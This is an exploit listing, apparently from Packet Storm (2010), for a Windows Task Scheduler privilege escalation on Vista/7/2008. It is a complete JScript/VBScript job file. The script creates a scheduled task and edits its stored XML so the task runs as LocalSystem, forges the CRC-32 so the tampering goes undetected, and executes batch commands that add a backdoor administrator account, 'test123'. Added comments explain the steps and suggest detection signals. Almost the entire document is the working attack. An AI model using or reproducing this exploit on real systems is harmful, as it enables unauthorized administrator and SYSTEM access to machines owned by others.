Windows Task Scheduler Privilege Escalation

2010-11-24T00:00:00
ID PACKETSTORM:96104
Type packetstorm
Reporter webDEViL
Modified 2010-11-24T00:00:00

Description

                                        
                                            `# Exploit Title: Windows Task Scheduler Privilege Escalation 0day  
# Date: 20-11-2010  
# Author: webDEViL  
# Tested on: Windows 7/2008 x86/x64  
  
  
<job id="tasksch-wD-0day">  
<script language="Javascript">  
  
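// CRC-32 lookup table (reflected form, polynomial 0xEDB88320, the same
// table used by zlib/PKZIP). The original listing spelled out all 256
// entries as literals; generating them removes a long block that is easy
// to corrupt when copied and makes the polynomial explicit. Entry 128 is
// the polynomial itself; the values match the literal table entry for
// entry (0x77073096 at index 1, 0x2D02EF8D at index 255).
var crc_table = (function () {
	var table = [];
	for (var n = 0; n < 256; n++) {
		var c = n;
		for (var k = 0; k < 8; k++) {
			// Shift right one bit, folding in the polynomial when a 1 falls out.
			c = (c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1);
		}
		// Store as an unsigned 32-bit value, like the original literals.
		table[n] = c >>> 0;
	}
	return table;
})();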
  
// Upper-case hex digit alphabet, indexed by nibble value (0-15).
var hD='0123456789ABCDEF';  
  
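function dec2hex(d) {  
// Formats d as exactly eight upper-case hex digits, treating it as an
// unsigned 32-bit integer: the unsigned shift wraps negative inputs
// (-1 -> "FFFFFFFF"), which matters because the CRC arithmetic in this
// file produces signed 32-bit intermediates.
// Locals are declared with var; the original assigned h and i as
// implicit globals, which a strict-mode engine rejects.
var out = '';
for (var nibble = 0; nibble < 8; nibble++) {
	// Take the low nibble, prepend its digit, then shift the next one down.
	out = '0123456789ABCDEF'.charAt(d & 15) + out;
	d >>>= 4;
}
return out;
}  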
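function encodeToHex(str){  
// Encodes every character code of str as lower-case hexadecimal.
// Each code is padded to at least two digits so the result round-trips
// through decodeFromHex, which consumes two-digit pairs; the original
// padded to three digits, so "A" became "041" and decoded back to the
// wrong character. Codes above 0xFF still emit more than two digits
// and will not round-trip, as before.
// Returns "" for an empty string. Unused by the rest of this listing.
var out = "";
for (var i = 0; i < str.length; i++) {
	var digits = str.charCodeAt(i).toString(16);
	if (digits.length < 2) digits = "0" + digits;
	out += digits;
}
return out;
}  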
function decodeFromHex(str){  
// Turns a string of two-digit hex pairs into the characters whose codes
// they spell ("4142" -> "AB"). A trailing odd digit is ignored. Each
// pair is converted with the same "0x" string coercion the original
// used, so malformed pairs behave identically (NaN -> "\u0000").
// A second, identical decodeFromHex appears later in this <script>.
var out = "";
for (var pos = 0; pos + 1 < str.length; pos += 2) {
	out += String.fromCharCode(Number("0x" + str.substring(pos, pos + 2)));
}
return out;
}  
  
  
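function calc_crc(anyForm) {  
// CRC-32 of the byte string given as hex in anyForm (two digits per byte):
// reflected table algorithm with initial value and final XOR 0xFFFFFFFF,
// i.e. the common zlib/PKZIP variant. Returns the checksum as eight
// upper-case hex digits via dec2hex.
// Each hex pair becomes one character through decodeFromHex; only the low
// byte of each code indexes the table. Intermediate values may be negative
// signed 32-bit integers — the unsigned shift and dec2hex take care of it.
// All locals are declared with var; the original wrote anyTextString,
// Crc_value, StringLength, i, tableIndex and Table_value as implicit globals.
var bytes = decodeFromHex(anyForm);
var crc = 0xFFFFFFFF;
for (var i = 0; i < bytes.length; i++) {
	var idx = (bytes.charCodeAt(i) ^ crc) & 0xFF;
	crc = (crc >>> 8) ^ crc_table[idx];
}
crc ^= 0xFFFFFFFF;
return dec2hex(crc);
}  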
  
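function rev_crc(leadString,endString,crc32) {  
// Finds the four bytes X for which CRC-32(lead + X + end) equals crc32.
// leadString and endString are hex strings (two digits per byte) and
// crc32 is eight hex digits; the result is X as eight hex digits in the
// byte order it must be inserted (least significant byte first).
// This is the classic table-driven CRC-32 inversion: every forward step
// is undone by locating the table entry whose high byte matches the
// register, so the computation depends on crc_table and on the
// linearity of CRC-32. The logic is unchanged from the original; locals
// are now declared with var instead of leaking anyTextString, Crc_value,
// StringLength, crc, tableIndex and Table_value as globals.
//
// First, we calculate the CRC-32 for the initial string
// (the register state after lead, before the final XOR)
//
var anyTextString=decodeFromHex(leadString);  
var tableIndex, Table_value;
var Crc_value = 0xFFFFFFFF;  
var StringLength=anyTextString.length;  
for (var i=0; i<StringLength; i++) {  
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;  
Table_value = crc_table[tableIndex];  
Crc_value >>>= 8;  
Crc_value ^= Table_value;  
}  
//
// Second, we calculate the CRC-32 without the final string: start from
// the target (undoing the final XOR) and step backwards over end, last
// byte first. Each backward step finds the table entry whose high byte
// matches the register and recovers the input byte that produced it.
//
var crc=parseInt(crc32,16);  
crc ^= 0xFFFFFFFF;  
anyTextString=decodeFromHex(endString);  
StringLength=anyTextString.length;  
for (var i=0; i<StringLength; i++) {  
tableIndex=0;  
Table_value = crc_table[tableIndex];  
while (((Table_value ^ crc) >>> 24) & 0xFF) {  
tableIndex++;  
Table_value = crc_table[tableIndex];  
}  
crc ^= Table_value;  
crc <<= 8;  
crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);  
}  
//
// Now let's find the 4-byte string: four more backward steps with zero
// input bytes give the register state that must precede X.
//
for (var i=0; i<4; i++) {  
tableIndex=0;  
Table_value = crc_table[tableIndex];  
while (((Table_value ^ crc) >>> 24) & 0xFF) {  
tableIndex++;  
Table_value = crc_table[tableIndex];  
}  
crc ^= Table_value;  
crc <<= 8;  
crc |= tableIndex;  
}  
// XOR with the state after lead yields the four patch bytes as one word.
crc ^= Crc_value;  
//
// Finally, display the results: format as hex and reverse the byte
// order so the word is emitted least significant byte first.
//
var TextString=dec2hex(crc);  
var Teststring='';  
Teststring=TextString.substring(6,8);  
Teststring+=TextString.substring(4,6);  
Teststring+=TextString.substring(2,4);  
Teststring+=TextString.substring(0,2);  
return Teststring  
}  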
function decodeFromHex(str){  
// Duplicate of the decodeFromHex defined earlier in this <script>; the
// two bodies are identical, so one of them can be deleted.
// Decodes consecutive two-digit hex pairs into characters; an odd
// trailing digit is dropped. Pairs are converted through the same "0x"
// string coercion as the original, so malformed input behaves the same.
var chars = [];
var remaining = str.length;
var at = 0;
while (remaining > 1) {
	chars[chars.length] = String.fromCharCode(Number("0x" + str.substring(at, at + 2)));
	at += 2;
	remaining -= 2;
}
return chars.join("");
}  
</script>  
  
  
  
<script language="VBScript">  
' Console handle used for the status lines printed below.
dim output  
set output = wscript.stdout  
output.writeline " Task Scheduler 0 day - Privilege Escalation "  
output.writeline " Should work on Vista/Win7/2008 x86/x64"  
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf  
' The task's action is a batch file in the user's temporary folder
' (GetSpecialFolder(2) is TemporaryFolder).
biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"  
Set objShell = CreateObject("WScript.Shell")  
' Registers a task named wDw00t (Run's third argument True waits for
' schtasks to finish). Detection note: a newly registered task whose
' action points into a temp directory is a useful signal on its own.
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True  
  
Set fso = CreateObject("Scripting.FileSystemObject")  
' Writes the task's action: creates a local account, adds it to the local
' Administrators group, then removes the task. Those commands being
' launched by the scheduler rather than an interactive shell is what a
' detection rule should key on. The handle a is never closed explicitly;
' it is flushed only when the object is released.
Set a = fso.CreateTextFile(biatchFile, True)  
a.WriteLine ("net user /add test123 test123")  
a.WriteLine ("net localgroup administrators /add test123")  
a.WriteLine ("schtasks /delete /f /TN wDw00t")  
  
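Function ReadByteArray(strFileName)  
' Returns the raw bytes of the file at strFileName as a byte array,
' read through an ADODB binary stream.
' Raises the ADODB error if the file cannot be opened. The stream is
' closed explicitly before returning; the original left it open until
' the object was released.
Const adTypeBinary = 1  
Dim stm  
Set stm = CreateObject("ADODB.Stream")  
stm.Type = adTypeBinary  
stm.Open  
stm.LoadFromFile strFileName  
ReadByteArray = stm.Read  
stm.Close  
End Function  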
  
Function OctetToHexStr (arrbytOctet)  
' Renders a byte string as upper-case hex, two digits per byte, starting
' at the third byte. The callers pass UTF-16LE data and separately
' re-add what the first two bytes stood for (a BOM or the first
' character), so the skip appears to be deliberate — confirm before
' reusing this elsewhere. Returns "" for inputs shorter than three bytes.
Dim pos, digits  
OctetToHexStr = ""  
For pos = 3 To Lenb (arrbytOctet)  
digits = Hex(Ascb(Midb(arrbytOctet, pos, 1)))  
If Len(digits) < 2 Then digits = "0" & digits  
OctetToHexStr = OctetToHexStr & digits  
Next  
End Function  
' Path of the stored definition of the task registered above.
strFileName="C:\windows\system32\tasks\wDw00t"  
  
' CRC-32 of the original task file (OctetToHexStr skips its first two
' bytes, presumably the UTF-16 byte-order mark). This is the value the
' modified file must reproduce later.
hexXML = OctetToHexStr (ReadByteArray(strFileName))  
'output.writeline hexXML  
crc32 = calc_crc(hexXML)  
output.writeline "Crc32 Original: "+crc32  
  
  
Set xmlDoc = CreateObject("Microsoft.XMLDOM")  
'permissions workaround  
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True  
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True  
Set objShell = WScript.CreateObject("WScript.Shell")  
' Obtains the task XML from schtasks instead of parsing the file itself.
' ReadLine drops line terminators, so strLine is the XML with newlines
' removed; strLine is never initialised and starts as Empty.
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")  
  
Do Until objExecObject.StdOut.AtEndOfStream  
strLine = strLine & objExecObject.StdOut.ReadLine()  
Loop  
' FFFE is the UTF-16LE byte-order mark and 3C00 is "<": OctetToHexStr
' skipped the first character of strLine, so it is re-added here along
' with a BOM. Looks like this is what lets the DOM load it as UTF-16 —
' confirm.
hexXML = "FFFE3C00"+OctetToHexStr(strLine)  
'output.writeline hexXML  
' Materialises the hex string as a file in the current directory, one
' byte per Chr call through the text stream.
Set ts = fso.createtextfile ("wDw00t.xml")  
For n = 1 To (Len (hexXML) - 1) step 2  
ts.write Chr ("&h" & Mid (hexXML, n, 2))  
Next  
ts.close  
  
' Rewrites the task's author and the principal it runs as (S-1-5-18 is
' the LocalSystem SID), then saves straight over the stored definition.
' That the task's creator can write this file at all is the weakness the
' script relies on; defenders should watch for writes to the tasks
' directory and for Principal/UserId values that differ from what was
' registered.
xmlDoc.load "wDw00t.xml"  
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")  
Author.text = "LocalSystem"  
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")  
UserId.text = "S-1-5-18"  
xmldoc.save(strFileName)  
  
hexXML = OctetToHexStr (ReadByteArray(strFileName))  
  
' The integrity check is repaired rather than bypassed: an XML comment
' is appended (3C0021002D002D00 is "<!--" and 2D002D003E00 is "-->" in
' UTF-16LE) and rev_crc computes the four comment bytes that make the
' whole file's CRC-32 equal the original. Presumably the scheduler
' validates the file with a plain CRC-32; a CRC is not a tamper check,
' since anyone who can write the file can satisfy it — a keyed MAC, or an
' ACL that prevents the write in the first place, is the mitigation.
leadString=hexXML+"3C0021002D002D00"  
endString="2D002D003E00"  
'output.writeline leadString  
impbytes=rev_crc(leadString,endString,crc32)  
output.writeline "Crc32 Magic Bytes: "+impbytes  
  
' Sanity check: the recomputed CRC should print the same value as
' "Crc32 Original" above.
finalString = leadString+impbytes+endString  
forge = calc_crc(finalString)  
output.writeline "Crc32 Forged: "+forge  
  
' Writes the patched definition back with a BOM. Note the bytes go through
' an ANSI text stream via Chr, so this only round-trips cleanly while the
' XML is ASCII — TODO confirm. stream is created but never used.
strHexString="FFFE"+finalString  
Set fso = CreateObject ("scripting.filesystemobject")  
Set stream = CreateObject ("adodb.stream")  
  
Set ts = fso.createtextfile (strFileName)  
  
For n = 1 To (Len (strHexString) - 1) step 2  
ts.write Chr ("&h" & Mid (strHexString, n, 2))  
Next  
ts.close  
  
  
' Disable/enable presumably makes the service re-read the modified file;
' the task is then run. Task-changed and task-run events for a task whose
' stored principal no longer matches its registration are the audit
' trail this leaves.
Set objShell = CreateObject("WScript.Shell")  
objShell.Run "schtasks /change /TN wDw00t /disable",,True  
objShell.Run "schtasks /change /TN wDw00t /enable",,True  
objShell.Run "schtasks /run /TN wDw00t",,True  
  
</script>  
</job>  
  
`